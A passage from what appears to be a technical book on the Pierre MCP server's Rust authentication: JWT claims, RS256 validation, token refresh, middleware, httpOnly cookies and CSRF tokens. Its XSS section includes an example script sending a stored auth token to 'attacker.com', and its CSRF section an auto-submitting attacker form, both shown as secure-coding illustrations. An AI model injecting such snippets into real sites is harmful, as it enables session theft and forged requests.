Using UUIDv4 for jti (JWT ID) ensures each token has a globally unique identifier. This prevents token replay attacks and allows the platform to revoke specific tokens by tracking their jti in a revocation list.
Admin Authentication Tokens
Admin tokens use a separate claims structure with fine-grained permissions:
Source: src/admin/jwt.rs:171-188
#![allow(unused)]
fn main() {
/// JWT claims for admin tokens
#[derive(Debug, Clone, Serialize, Deserialize)]
struct AdminTokenClaims {
// Standard JWT claims
iss: String, // Issuer: "pierre-mcp-server"
sub: String, // Subject: token ID
aud: String, // Audience: "admin-api"
exp: u64, // Expiration time
iat: u64, // Issued at
nbf: u64, // Not before
jti: String, // JWT ID: token ID
// Custom claims
service_name: String,
permissions: Vec<crate::admin::models::AdminPermission>,
is_super_admin: bool,
token_type: String, // Always "admin"
}
}
Admin tokens include:
permissions: List of specific admin permissions (e.g.,["users:read", "users:write"])is_super_admin: Boolean flag for unrestricted accessservice_name: Identifies which service created the tokentoken_type: Discriminator to prevent user tokens from being used as admin tokens
Source: src/admin/jwt.rs:64-97
#![allow(unused)]
fn main() {
/// Generate JWT token using RS256 (asymmetric signing)
///
/// # Errors
/// Returns an error if JWT encoding fails
pub fn generate_token(
&self,
token_id: &str,
service_name: &str,
permissions: &AdminPermissions,
is_super_admin: bool,
expires_at: Option<DateTime<Utc>>,
jwks_manager: &crate::admin::jwks::JwksManager,
) -> Result<String> {
let now = Utc::now();
let exp = expires_at.unwrap_or_else(|| now + Duration::days(365));
let claims = AdminTokenClaims {
// Standard JWT claims
iss: service_names::PIERRE_MCP_SERVER.into(),
sub: token_id.to_owned(),
aud: service_names::ADMIN_API.into(),
exp: u64::try_from(exp.timestamp().max(0)).unwrap_or(0),
iat: u64::try_from(now.timestamp().max(0)).unwrap_or(0),
nbf: u64::try_from(now.timestamp().max(0)).unwrap_or(0),
jti: token_id.to_owned(),
// Custom claims
service_name: service_name.to_owned(),
permissions: permissions.to_vec(),
is_super_admin,
token_type: "admin".into(),
};
// Sign with RS256 using JWKS
Ok(jwks_manager
.sign_admin_token(&claims)
.map_err(|e| AppError::internal(format!("Failed to generate RS256 admin JWT: {e}")))?)
}
}
Rust Idiom: u64::try_from(exp.timestamp().max(0)).unwrap_or(0)
This pattern handles two edge cases:
max(0): Prevents negative timestamps (before Unix epoch)try_from(): Safely convertsi64tou64(timestamps should always be positive)unwrap_or(0): Falls back to epoch if conversion fails (defensive programming)
The combination ensures the exp claim is always a valid positive integer.
OAuth Access Tokens
The platform generates OAuth 2.0 access tokens with limited scopes:
Source: src/auth.rs:588-622
#![allow(unused)]
fn main() {
/// Generate OAuth access token with RS256 asymmetric signing
///
/// This method uses RSA private key from JWKS manager for token signing.
/// Clients can verify tokens using the public key from /.well-known/jwks.json
///
/// # Errors
///
/// Returns an error if:
/// - JWT token generation fails
/// - System time is unavailable
/// - JWKS manager has no active key
pub fn generate_oauth_access_token(
&self,
jwks_manager: &crate::admin::jwks::JwksManager,
user_id: &Uuid,
scopes: &[String],
tenant_id: Option<String>,
) -> Result<String> {
let now = Utc::now();
let expiry =
now + Duration::hours(crate::constants::limits::OAUTH_ACCESS_TOKEN_EXPIRY_HOURS);
let claims = Claims {
sub: user_id.to_string(),
email: format!("oauth_{user_id}@system.local"),
iat: now.timestamp(),
exp: expiry.timestamp(),
iss: crate::constants::service_names::PIERRE_MCP_SERVER.to_owned(),
jti: Uuid::new_v4().to_string(),
providers: scopes.to_vec(),
aud: crate::constants::service_names::MCP.to_owned(),
tenant_id,
};
// Get active RSA key from JWKS manager
let active_key = jwks_manager.get_active_key()?;
let encoding_key = active_key.encoding_key()?;
// Create RS256 header with kid
let mut header = Header::new(Algorithm::RS256);
header.kid = Some(active_key.kid.clone());
let token = encode(&header, &claims, &encoding_key)?;
Ok(token)
}
}
OAuth tokens use the providers claim to store granted scopes (e.g., ["read:activities", "write:workouts"]). This allows the platform to enforce fine-grained permissions without database lookups.
Token Validation and Error Handling
Token validation verifies the RS256 signature and checks expiration, audience, and issuer claims.
RS256 Signature Verification
The platform uses the kid from the token header to look up the correct public key:
Source: src/auth.rs:256-292
#![allow(unused)]
fn main() {
/// Validate a RS256 JWT token using JWKS public keys
///
/// # Errors
///
/// Returns an error if:
/// - Token signature is invalid
/// - Token has expired
/// - Token is malformed or not valid JWT format
/// - Token header doesn't contain kid (key ID)
/// - JWKS manager doesn't have the specified key
/// - Token claims cannot be deserialized
pub fn validate_token(
&self,
token: &str,
jwks_manager: &crate::admin::jwks::JwksManager,
) -> Result<Claims> {
// Extract kid from token header
let header = jsonwebtoken::decode_header(token)?;
let kid = header.kid.ok_or_else(|| -> anyhow::Error {
AppError::auth_invalid("Token header missing kid (key ID)").into()
})?;
tracing::debug!("Validating RS256 JWT token with kid: {}", kid);
// Get public key from JWKS manager
let key_pair = jwks_manager.get_key(&kid).ok_or_else(|| -> anyhow::Error {
AppError::auth_invalid(format!("Key not found in JWKS: {kid}")).into()
})?;
let decoding_key =
key_pair
.decoding_key()
.map_err(|e| JwtValidationError::TokenInvalid {
reason: format!("Failed to get decoding key: {e}"),
})?;
let mut validation = Validation::new(Algorithm::RS256);
validation.validate_exp = true;
validation.set_audience(&[crate::constants::service_names::MCP]);
validation.set_issuer(&[crate::constants::service_names::PIERRE_MCP_SERVER]);
let token_data = decode::<Claims>(token, &decoding_key, &validation).map_err(|e| {
tracing::error!("RS256 JWT validation failed: {:?}", e);
e
})?;
Ok(token_data.claims)
}
}
Key rotation support: The kid lookup allows the platform to rotate RSA keys without invalidating existing tokens. Tokens signed with old keys remain valid as long as the old key pair exists in JWKS.
Rust Idiom: ok_or_else(|| -> anyhow::Error { ... })
This pattern converts Option<T> to Result<T, E> with lazy error construction. The closure only executes if the option is None, avoiding unnecessary allocations for successful cases.
Detailed Validation Errors
The platform provides detailed error messages for debugging token issues:
Source: src/auth.rs:44-104
#![allow(unused)]
fn main() {
/// JWT validation error with detailed information
#[derive(Debug, Clone)]
pub enum JwtValidationError {
/// Token has expired
TokenExpired {
/// When the token expired
expired_at: DateTime<Utc>,
/// Current time for reference
current_time: DateTime<Utc>,
},
/// Token signature is invalid
TokenInvalid {
/// Reason for invalidity
reason: String,
},
/// Token is malformed (not proper JWT format)
TokenMalformed {
/// Details about malformation
details: String,
},
}
impl std::fmt::Display for JwtValidationError {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
match self {
Self::TokenExpired {
expired_at,
current_time,
} => {
let duration_expired = current_time.signed_duration_since(*expired_at);
if duration_expired.num_minutes() < 60 {
write!(
f,
"JWT token expired {} minutes ago at {}",
duration_expired.num_minutes(),
expired_at.format("%Y-%m-%d %H:%M:%S UTC")
)
} else if duration_expired.num_hours() < USER_SESSION_EXPIRY_HOURS {
write!(
f,
"JWT token expired {} hours ago at {}",
duration_expired.num_hours(),
expired_at.format("%Y-%m-%d %H:%M:%S UTC")
)
} else {
write!(
f,
"JWT token expired {} days ago at {}",
duration_expired.num_days(),
expired_at.format("%Y-%m-%d %H:%M:%S UTC")
)
}
}
Self::TokenInvalid { reason } => {
write!(f, "JWT token signature is invalid: {reason}")
}
Self::TokenMalformed { details } => {
write!(f, "JWT token is malformed: {details}")
}
}
}
}
}
User experience: Human-readable error messages help developers debug authentication issues. For example, “JWT token expired 3 hours ago at 2025-01-15 14:30:00 UTC” is more actionable than “Token expired”.
Expiration Checking
The platform separates signature verification from expiration checking for better error messages:
Source: src/auth.rs:381-421
#![allow(unused)]
fn main() {
/// Decode RS256 JWT token claims without expiration validation
fn decode_token_claims(
token: &str,
jwks_manager: &crate::admin::jwks::JwksManager,
) -> Result<Claims, JwtValidationError> {
// Extract kid from token header
let header =
jsonwebtoken::decode_header(token).map_err(|e| JwtValidationError::TokenMalformed {
details: format!("Failed to decode token header: {e}"),
})?;
let kid = header
.kid
.ok_or_else(|| JwtValidationError::TokenMalformed {
details: "Token header missing kid (key ID)".to_owned(),
})?;
// Get public key from JWKS manager
let key_pair =
jwks_manager
.get_key(&kid)
.ok_or_else(|| JwtValidationError::TokenInvalid {
reason: format!("Key not found in JWKS: {kid}"),
})?;
let decoding_key =
key_pair
.decoding_key()
.map_err(|e| JwtValidationError::TokenInvalid {
reason: format!("Failed to get decoding key: {e}"),
})?;
let mut validation_no_exp = Validation::new(Algorithm::RS256);
validation_no_exp.validate_exp = false;
validation_no_exp.set_audience(&[crate::constants::service_names::MCP]);
validation_no_exp.set_issuer(&[crate::constants::service_names::PIERRE_MCP_SERVER]);
decode::<Claims>(token, &decoding_key, &validation_no_exp)
.map(|token_data| token_data.claims)
.map_err(|e| Self::convert_jwt_error(&e))
}
}
Design pattern: Decode first with validate_exp = false, then check expiration manually. This allows detailed expiration errors while still verifying the signature for refresh tokens.
Source: src/auth.rs:423-438
#![allow(unused)]
fn main() {
/// Validate claims expiration with detailed logging
fn validate_claims_expiry(claims: &Claims) -> Result<(), JwtValidationError> {
let current_time = Utc::now();
let expired_at = DateTime::from_timestamp(claims.exp, 0).unwrap_or_else(Utc::now);
tracing::debug!(
"Token validation details - User: {}, Issued: {}, Expires: {}, Current: {}",
claims.sub,
DateTime::from_timestamp(claims.iat, 0)
.map_or_else(|| "unknown".into(), |d| d.to_rfc3339()),
expired_at.to_rfc3339(),
current_time.to_rfc3339()
);
Self::check_token_expiry(claims, current_time, expired_at)
}
}
Session Management and Token Refresh
The platform creates sessions after successful authentication and supports token refresh for better user experience.
Session Creation
Source: src/auth.rs:449-464
#![allow(unused)]
fn main() {
/// Create a user session from a valid user with RS256 token
///
/// # Errors
///
/// Returns an error if:
/// - JWT token generation fails
/// - User data is invalid
/// - System time is unavailable
/// - JWKS manager has no active key
pub fn create_session(
&self,
user: &User,
jwks_manager: &crate::admin::jwks::JwksManager,
) -> Result<UserSession> {
let jwt_token = self.generate_token(user, jwks_manager)?;
let expires_at = Utc::now() + Duration::hours(self.token_expiry_hours);
Ok(UserSession {
user_id: user.id,
jwt_token,
expires_at,
email: user.email.clone(),
available_providers: user.available_providers(),
})
}
}
The UserSession struct contains everything a client needs to interact with the API:
jwt_token: RS256-signed JWT for authenticationexpires_at: When the token becomes invalidavailable_providers: Which fitness providers the user has connected
Token Refresh Pattern
Source: src/auth.rs:515-529
#![allow(unused)]
fn main() {
/// Refresh a token if it's still valid (RS256)
///
/// # Errors
///
/// Returns an error if:
/// - Old token signature is invalid (even if expired)
/// - Token is malformed
/// - New token generation fails
/// - User data is invalid
/// - JWKS manager has no active key
pub fn refresh_token(
&self,
old_token: &str,
user: &User,
jwks_manager: &crate::admin::jwks::JwksManager,
) -> Result<String> {
// First validate the old token signature (even if expired)
// This ensures the refresh request is legitimate
Self::decode_token_claims(old_token, jwks_manager).map_err(|e| -> anyhow::Error {
AppError::auth_invalid(format!("Failed to validate old token for refresh: {e}")).into()
})?;
// Generate new token - atomic counter ensures uniqueness
self.generate_token(user, jwks_manager)
}
}
Security: The refresh pattern validates the old token’s signature even if expired. This prevents attackers from forging expired tokens to request new ones.
Rust Idiom: Decode without expiration check (decode_token_claims) ensures legitimate expired tokens can be refreshed while forged tokens are rejected.
Middleware-Based Authentication
The platform uses middleware to authenticate MCP requests with both JWT tokens and API keys.
Request Authentication Flow
┌──────────────────────────────────────────────────────────────┐
│ MCP Request │
│ │
│ Authorization: Bearer eyJhbGc... or pk_live_abc123... │
└────────────────────────┬─────────────────────────────────────┘
│
▼
┌──────────────────────────┐
│ McpAuthMiddleware │
│ │
│ authenticate_request() │
└──────────────────────────┘
│
┌────────────┴────────────┐
│ │
▼ ▼
┌───────────────┐ ┌──────────────┐
│ JWT Token │ │ API Key │
│ (Bearer) │ │ (pk_live_) │
└───────────────┘ └──────────────┘
│ │
▼ ▼
┌───────────────┐ ┌──────────────┐
│ validate_token│ │ hash + lookup│
│ with JWKS │ │ in database │
└───────────────┘ └──────────────┘
│ │
└────────────┬────────────┘
▼
┌──────────────┐
│ AuthResult │
│ │
│ - user_id │
│ - tier │
│ - rate_limit│
└──────────────┘
Source: src/middleware/auth.rs:65-136
#![allow(unused)]
fn main() {
#[tracing::instrument(
skip(self, auth_header),
fields(
auth_method = tracing::field::Empty,
user_id = tracing::field::Empty,
tenant_id = tracing::field::Empty,
success = tracing::field::Empty,
)
)]
pub async fn authenticate_request(&self, auth_header: Option<&str>) -> Result<AuthResult> {
tracing::debug!("=== AUTH MIDDLEWARE AUTHENTICATE_REQUEST START ===");
tracing::debug!("Auth header provided: {}", auth_header.is_some());
let auth_str = if let Some(header) = auth_header {
// Security: Do not log auth header content to prevent token leakage
tracing::debug!(
"Authentication attempt with header type: {}",
if header.starts_with(key_prefixes::API_KEY_LIVE) {
"API_KEY"
} else if header.starts_with("Bearer ") {
"JWT_TOKEN"
} else {
"UNKNOWN"
}
);
header
} else {
tracing::warn!("Authentication failed: Missing authorization header");
return Err(auth_error("Missing authorization header - Request authentication requires Authorization header with Bearer token or API key").into());
};
// Try API key authentication first (starts with pk_live_)
if auth_str.starts_with(key_prefixes::API_KEY_LIVE) {
tracing::Span::current().record("auth_method", "API_KEY");
tracing::debug!("Attempting API key authentication");
match self.authenticate_api_key(auth_str).await {
Ok(result) => {
tracing::Span::current()
.record("user_id", result.user_id.to_string())
.record("tenant_id", result.user_id.to_string()) // Use user_id as tenant_id for now
.record("success", true);
tracing::info!(
"API key authentication successful for user: {}",
result.user_id
);
Ok(result)
}
Err(e) => {
tracing::Span::current().record("success", false);
tracing::warn!("API key authentication failed: {}", e);
Err(e)
}
}
}
// Then try Bearer token authentication
else if let Some(token) = auth_str.strip_prefix("Bearer ") {
tracing::Span::current().record("auth_method", "JWT_TOKEN");
tracing::debug!("Attempting JWT token authentication");
match self.authenticate_jwt_token(token).await {
Ok(result) => {
tracing::Span::current()
.record("user_id", result.user_id.to_string())
.record("tenant_id", result.user_id.to_string()) // Use user_id as tenant_id for now
.record("success", true);
tracing::info!("JWT authentication successful for user: {}", result.user_id);
Ok(result)
}
Err(e) => {
tracing::Span::current().record("success", false);
tracing::warn!("JWT authentication failed: {}", e);
Err(e)
}
}
} else {
tracing::Span::current()
.record("auth_method", "INVALID")
.record("success", false);
tracing::warn!("Authentication failed: Invalid authorization header format (expected 'Bearer ...' or 'pk_live_...')");
Err(AppError::auth_invalid("Invalid authorization header format - must be 'Bearer <token>' or 'pk_live_<api_key>'").into())
}
}
}
Rust Idiom: #[tracing::instrument(skip(self, auth_header), fields(...))]
This attribute automatically creates a tracing span for the function with structured fields. The skip(self, auth_header) prevents logging sensitive data (JWT tokens). The empty fields get populated dynamically using record().
Security: The middleware logs authentication attempts without exposing token contents, balancing observability with security.
JWT Authentication in Middleware
Source: src/middleware/auth.rs:194-228
#![allow(unused)]
fn main() {
/// Authenticate using RS256 JWT token
async fn authenticate_jwt_token(&self, token: &str) -> Result<AuthResult> {
let claims = self
.auth_manager
.validate_token_detailed(token, &self.jwks_manager)?;
let user_id = crate::utils::uuid::parse_uuid(&claims.sub)
.map_err(|_| AppError::auth_invalid("Invalid user ID in token"))?;
// Get user from database to check tier and rate limits
let user = self
.database
.get_user(user_id)
.await?
.ok_or_else(|| AppError::not_found(format!("User {user_id}")))?;
// Get current usage for rate limiting
let current_usage = self.database.get_jwt_current_usage(user_id).await?;
let rate_limit = self
.rate_limit_calculator
.calculate_jwt_rate_limit(&user, current_usage);
// Check rate limit
if rate_limit.is_rate_limited {
return Err(auth_error("JWT token rate limit exceeded").into());
}
Ok(AuthResult {
user_id,
auth_method: AuthMethod::JwtToken {
tier: format!("{:?}", user.tier).to_lowercase(),
},
rate_limit,
})
}
}
The middleware:
- Validates token signature with RS256 using JWKS
- Extracts user ID from
subclaim - Looks up user in database for current rate limit tier
- Calculates rate limit based on tier and current usage
- Returns
AuthResultwith user context and rate limit info
Authentication Result
Source: src/auth.rs:133-158
#![allow(unused)]
fn main() {
/// Authentication result with user context and rate limiting info
#[derive(Debug)]
pub struct AuthResult {
/// Authenticated user ID
pub user_id: Uuid,
/// Authentication method used
pub auth_method: AuthMethod,
/// Rate limit information (always provided for both API keys and JWT tokens)
pub rate_limit: UnifiedRateLimitInfo,
}
/// Authentication method used
#[derive(Debug, Clone)]
pub enum AuthMethod {
/// JWT token authentication
JwtToken {
/// User tier for rate limiting
tier: String,
},
/// API key authentication
ApiKey {
/// API key ID
key_id: String,
/// API key tier
tier: String,
},
}
}
The AuthResult provides downstream handlers with:
user_id: For database queries and multi-tenant isolationauth_method: For logging and analyticsrate_limit: For enforcing API usage limits
Real-World Usage Patterns
Admin API Authentication
Source: src/admin/jwt.rs:190-251
#![allow(unused)]
fn main() {
/// Token generation configuration
#[derive(Debug, Clone)]
pub struct TokenGenerationConfig {
/// Service name for the token
pub service_name: String,
/// Optional human-readable description
pub service_description: Option<String>,
/// Permissions granted to this token
pub permissions: Option<AdminPermissions>,
/// Token expiration in days (None for no expiration)
pub expires_in_days: Option<u64>,
/// Whether this is a super admin token with full privileges
pub is_super_admin: bool,
}
impl TokenGenerationConfig {
/// Create config for regular admin token
#[must_use]
pub fn regular_admin(service_name: String) -> Self {
Self {
service_name,
service_description: None,
permissions: Some(AdminPermissions::default_admin()),
expires_in_days: Some(365), // 1 year
is_super_admin: false,
}
}
/// Create config for super admin token
#[must_use]
pub fn super_admin(service_name: String) -> Self {
Self {
service_name,
service_description: Some("Super Admin Token".into()),
permissions: Some(AdminPermissions::super_admin()),
expires_in_days: None, // Never expires
is_super_admin: true,
}
}
/// Get effective permissions
#[must_use]
pub fn get_permissions(&self) -> AdminPermissions {
self.permissions.as_ref().map_or_else(
|| {
if self.is_super_admin {
AdminPermissions::super_admin()
} else {
AdminPermissions::default_admin()
}
},
std::clone::Clone::clone,
)
}
/// Get expiration date
#[must_use]
pub fn get_expiration(&self) -> Option<DateTime<Utc>> {
self.expires_in_days
.map(|days| Utc::now() + Duration::days(i64::try_from(days).unwrap_or(365)))
}
}
}
Builder pattern: The TokenGenerationConfig provides constructor methods (regular_admin, super_admin) for common configurations while allowing custom settings.
OAuth Token Generation
The platform generates OAuth access tokens for external client applications:
Source: src/auth.rs:624-668
#![allow(unused)]
fn main() {
/// Generate client credentials token with RS256 asymmetric signing
///
/// This method uses RSA private key from JWKS manager for token signing.
/// Clients can verify tokens using the public key from /.well-known/jwks.json
///
/// # Errors
///
/// Returns an error if:
/// - JWT token generation fails
/// - System time is unavailable
/// - JWKS manager has no active key
pub fn generate_client_credentials_token(
&self,
jwks_manager: &crate::admin::jwks::JwksManager,
client_id: &str,
scopes: &[String],
tenant_id: Option<String>,
) -> Result<String> {
let now = Utc::now();
let expiry = now + Duration::hours(1); // 1 hour for client credentials
let claims = Claims {
sub: format!("client:{client_id}"),
email: "client_credentials".to_owned(),
iat: now.timestamp(),
exp: expiry.timestamp(),
iss: crate::constants::service_names::PIERRE_MCP_SERVER.to_owned(),
jti: Uuid::new_v4().to_string(),
providers: scopes.to_vec(),
aud: crate::constants::service_names::MCP.to_owned(),
tenant_id,
};
// Get active RSA key from JWKS manager
let active_key = jwks_manager.get_active_key()?;
let encoding_key = active_key.encoding_key()?;
// Create RS256 header with kid
let mut header = Header::new(Algorithm::RS256);
header.kid = Some(active_key.kid.clone());
let token = encode(&header, &claims, &encoding_key)?;
Ok(token)
}
}
Note: Client credentials tokens use sub: format!("client:{client_id}") to distinguish them from user tokens. The client: prefix allows middleware to apply different authorization rules for machine-to-machine vs user authentication.
Web Application Security: Cookies and CSRF
For web applications (browser-based clients), Pierre implements secure cookie-based authentication with CSRF protection to prevent XSS and CSRF attacks.
The XSS Problem with Localstorage
Storing JWT tokens in localStorage creates XSS vulnerability:
// ❌ VULNERABLE: localStorage accessible to JavaScript
localStorage.setItem('auth_token', jwt);
// Attacker can inject script:
<script>
fetch('https://attacker.com/steal', {
body: localStorage.getItem('auth_token')
});
</script>
Problem: Any JavaScript code (including malicious scripts from XSS) can read localStorage. If an attacker injects JavaScript (via XSS vulnerability), they can steal the authentication token.
Httponly Cookies Solution
httpOnly cookies are inaccessible to JavaScript:
#![allow(unused)]
fn main() {
/// Set secure authentication cookie with httpOnly flag
pub fn set_auth_cookie(headers: &mut HeaderMap, token: &str, max_age_secs: i64) {
let cookie = format!(
"auth_token={}; HttpOnly; Secure; SameSite=Strict; Max-Age={}; Path=/",
token, max_age_secs
);
headers.insert(
header::SET_COOKIE,
HeaderValue::from_str(&cookie).unwrap(),
);
}
}
Source: src/security/cookies.rs:15-25
Cookie security flags:
- HttpOnly=true: Browser prevents JavaScript access (XSS protection)
- Secure=true: Cookie only sent over HTTPS (prevents sniffing)
- SameSite=Strict: Cookie not sent on cross-origin requests (CSRF mitigation)
- Max-Age=86400: Cookie expires after 24 hours (matches JWT expiry)
CSRF Protection with Double-Submit Cookies
httpOnly cookies solve XSS but create CSRF vulnerability. An attacker’s site can trigger authenticated requests because browsers automatically include cookies:
<!-- Attacker's site: attacker.com -->
<form action="https://pierre.example.com/api/something" method="POST">
<input type="hidden" name="data" value="malicious">
</form>
<script>document.forms[0].submit();</script>
Problem: Browser automatically includes auth_token cookie with cross-origin request.
Solution: CSRF tokens using double-submit cookie pattern.
CSRF Token Manager
Source: src/security/csrf.rs:18-58
#![allow(unused)]
fn main() {
/// CSRF token manager with user-scoped validation
pub struct CsrfTokenManager {
/// Map of CSRF tokens to (user_id, expiry)
tokens: Arc<RwLock<HashMap<String, (Uuid, DateTime<Utc>)>>>,
}
impl CsrfTokenManager {
/// Generate cryptographically secure CSRF token
pub async fn generate_token(&self, user_id: Uuid) -> AppResult<String> {
// 256-bit (32 byte) random token
let mut token_bytes = [0u8; 32];
rand::thread_rng().fill_bytes(&mut token_bytes);
let token = hex::encode(token_bytes);
// Store token with 30-minute expiration
let expiry = Utc::now() + Duration::minutes(30);
let mut tokens = self.tokens.write().await;
tokens.insert(token.clone(), (user_id, expiry));
Ok(token)
}
/// Validate CSRF token for specific user
pub async fn validate_token(&self, token: &str, user_id: Uuid) -> AppResult<()> {
let tokens = self.tokens.read().await;
let (stored_user_id, expiry) = tokens
.get(token)
.ok_or_else(|| AppError::unauthorized("Invalid CSRF token"))?;
// Check token belongs to this user
if *stored_user_id != user_id {
return Err(AppError::unauthorized("CSRF token user mismatch"));
}
// Check token not expired
if *expiry < Utc::now() {
return Err(AppError::unauthorized("CSRF token expired"));
}
Ok(())
}
}
}
Implementation notes:
- User-scoped tokens: Token validation requires matching user_id from JWT. Attacker cannot use victim’s CSRF token even if stolen.
- Cryptographic randomness: 256-bit tokens (32 bytes) provide sufficient entropy to prevent brute force.
- Short expiration: 30-minute lifetime limits exposure window. JWT tokens last 24 hours, CSRF tokens expire sooner.
- In-memory storage: HashMap provides fast lookups. For distributed systems, use Redis instead.
CSRF Middleware Validation
Source: src/middleware/csrf.rs:45-91
#![allow(unused)]
fn main() {
impl CsrfMiddleware {
/// Validate CSRF token for state-changing operations
pub async fn validate_csrf(
&self,
headers: &HeaderMap,
method: &Method,
user_id: Uuid,
) -> AppResult<()> {
// Skip CSRF validation for safe methods
if !Self::requires_csrf_validation(method) {
return Ok(());
}
// Extract CSRF token from X-CSRF-Token header
let csrf_token = headers
.get("X-CSRF-Token")
.and_then(|v| v.to_str().ok())
.ok_or_else(|| AppError::unauthorized("Missing CSRF token"))?;
// Validate token belongs to this user
self.manager.validate_token(csrf_token, user_id).await
}
/// Check if HTTP method requires CSRF validation
pub fn requires_csrf_validation(method: &Method) -> bool {
matches!(
method,
&Method::POST | &Method::PUT | &Method::DELETE | &Method::PATCH
)
}
}
}
Rust idiom: matches! macro provides pattern matching for HTTP methods without verbose == comparisons.
Authentication Flow with Cookies and CSRF
login handler (POST /api/auth/login):
Source: src/routes/auth.rs:1044-1088
#![allow(unused)]
fn main() {
pub async fn handle_login(
State(resources): State<Arc<ServerResources>>,
Json(request): Json<LoginRequest>,
) -> Result<Response, AppError> {
// 1. Authenticate user (verify password)
let user = resources.database.get_user_by_email(&request.email).await?;
verify_password(&request.password, &user.password_hash)?;
// 2. Generate JWT token
let jwt_token = resources
.auth_manager
.generate_token_rs256(&resources.jwks_manager, &user.id, &user.email, providers)
.context("Failed to generate JWT token")?;
// 3. Generate CSRF token
let csrf_token = resources.csrf_manager.generate_token(user.id).await?;
// 4. Set secure cookies
let mut headers = HeaderMap::new();
set_auth_cookie(&mut headers, &jwt_token, 86400); // 24 hours
set_csrf_cookie(&mut headers, &csrf_token, 1800); // 30 minutes
// 5. Return JSON response with CSRF token
let response = LoginResponse {
jwt_token: Some(jwt_token), // backward compatibility
csrf_token,
user: UserInfo { id: user.id, email: user.email },
expires_at: Utc::now() + Duration::hours(24),
};
Ok((StatusCode::OK, headers, Json(response)).into_response())
}
}
Flow breakdown:
- Authenticate user: Verify email/password using Argon2 or bcrypt
- Generate JWT: Create RS256-signed token with 24-hour expiry
- Generate CSRF token: Create 256-bit random token with 30-minute expiry
- Set cookies: Both auth_token (httpOnly) and csrf_token (readable) cookies
- Return CSRF in JSON: Frontend needs CSRF token to include in X-CSRF-Token header
authenticated request validation:
#![allow(unused)]
fn main() {
async fn protected_handler(
State(resources): State<Arc<ServerResources>>,
headers: HeaderMap,
) -> Result<Response, AppError> {
// 1. Extract JWT from auth_token cookie
let auth_result = resources
.auth_middleware
.authenticate_request_with_headers(&headers)
.await?;
// 2. Validate CSRF token for POST/PUT/DELETE/PATCH
resources
.csrf_middleware
.validate_csrf(&headers, &Method::POST, auth_result.user_id)
.await?;
// 3. Process authenticated request
// ...
}
}
Source: src/middleware/auth.rs:318-356
Middleware tries multiple authentication methods:
- Cookie-based: Extract JWT from
auth_tokencookie (preferred for web apps) - Bearer token: Extract from
Authorization: Bearer <token>header (API clients) - API key: Extract from
X-API-Keyheader (service-to-service)
Frontend Integration Example
axios configuration:
// Enable automatic cookie handling
axios.defaults.withCredentials = true;
// Request interceptor: add CSRF token to state-changing requests
axios.interceptors.request.use((config) => {
if (['POST', 'PUT', 'DELETE', 'PATCH'].includes(config.method?.toUpperCase() || '')) {
const csrfToken = getCsrfToken();
if (csrfToken && config.headers) {
config.headers['X-CSRF-Token'] = csrfToken;
}
}
return config;
});
login flow:
async function login(email: string, password: string) {
const response = await axios.post('/api/auth/login', { email, password });
// Store CSRF token in memory (cookies set automatically by browser)
setCsrfToken(response.data.csrf_token);
// Store user info in localStorage (not sensitive)
localStorage.setItem('user', JSON.stringify(response.data.user));
return response.data;
}
Why this works:
- Browser automatically sends
auth_tokenandcsrf_tokencookies with every request - Frontend explicitly includes
X-CSRF-Tokenheader for state-changing requests - Attacker’s site cannot read CSRF token (cross-origin restriction)
- Attacker cannot forge valid CSRF token (cryptographic randomness)
Security Model Summary
| Attack Type | Protection Mechanism |
|---|---|
| XSS token theft | httpOnly cookies (JavaScript cannot read auth_token) |
| CSRF | double-submit cookie pattern (X-CSRF-Token header required) |
| Session fixation | Secure flag (cookies only sent over HTTPS) |
| Cross-site access | SameSite=Strict (cookies not sent on cross-origin requests) |
| Token injection | User-scoped CSRF validation (token tied to user_id in JWT) |
| Replay attacks | CSRF token expiration (30-minute lifetime) |
Design tradeoff: CSRF tokens expire after 30 minutes, requiring periodic refresh. This trades convenience for security - shorter CSRF lifetime limits exposure window.
Rust idiom: Cookie and CSRF managers use Arc<RwLock<HashMap>> for concurrent access. RwLock allows multiple readers or single writer, optimizing for read-heavy token validation workload.
Key Takeaways
-
RS256 asymmetric signing: Uses RSA key pairs from JWKS (Chapter 5) for secure token signing. Clients verify with public keys, server signs with private key.
-
Standard JWT claims: Platform follows RFC 7519 with
iss,sub,aud,exp,iat,jtifor interoperability. Custom claims extend functionality without breaking standards. -
Key rotation support: The
kid(key ID) in token headers allows seamless RSA key rotation. Old tokens remain valid until expiration. -
Detailed error handling:
JwtValidationErrorenum provides human-readable messages for debugging (“token expired 3 hours ago” vs “invalid token”). -
Middleware authentication:
McpAuthMiddlewaresupports both JWT tokens and API keys with unified rate limiting and user context extraction. -
Token refresh pattern: Validates old token signature even if expired, prevents forged refresh requests while improving UX.
-
Multi-tenant claims:
tenant_idclaim enables data isolation,providersclaim restricts access to connected fitness providers. -
Separate admin tokens:
AdminTokenClaimswith fine-grained permissions prevents privilege escalation from user tokens to admin APIs. -
Structured logging:
#[tracing::instrument]provides observability without exposing sensitive token data in logs. -
OAuth integration: Platform generates standard OAuth 2.0 access tokens and client credentials tokens for third-party integrations.
-
Cookie-based authentication: httpOnly cookies prevent XSS token theft, Secure and SameSite flags provide additional protection layers.
-
CSRF protection: Double-submit cookie pattern with user-scoped validation prevents cross-site request forgery attacks on web applications.
-
Security layering: Multiple authentication methods (cookies, Bearer tokens, API keys) coexist with middleware fallback for different client types.
Next Chapter: Chapter 07: Multi-Tenant Database Isolation - Learn how the Pierre platform enforces tenant boundaries at the database layer using JWT claims and row-level security.
Chapter 07: Multi-Tenant Database Isolation
This chapter explores how the Pierre Fitness Platform enforces strict tenant boundaries at the database layer, ensuring complete data isolation between different organizations using the same server instance. You’ll learn about tenant context extraction, role-based access control, and query-level tenant filtering.
Multi-Tenant Architecture Overview
The Pierre platform implements true multi-tenancy, where multiple organizations (tenants) share the same database and application server while maintaining complete data isolation.
Architecture Layers
┌──────────────────────────────────────────────────────────────┐
│ HTTP Request │
│ Authorization: Bearer eyJhbGc... (JWT token) │
└────────────────────────┬─────────────────────────────────────┘
│
▼
┌──────────────────────────┐
│ McpAuthMiddleware │
│ - Extract user_id │
│ - Validate JWT │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ TenantIsolation │
│ - Look up user.tenant_id│
│ - Extract TenantContext │
│ - Validate user role │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ Database Queries │
│ WHERE tenant_id = $1 │
│ (automatic filtering) │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ Tenant-Scoped Results │
│ (only this org's data) │
└──────────────────────────┘
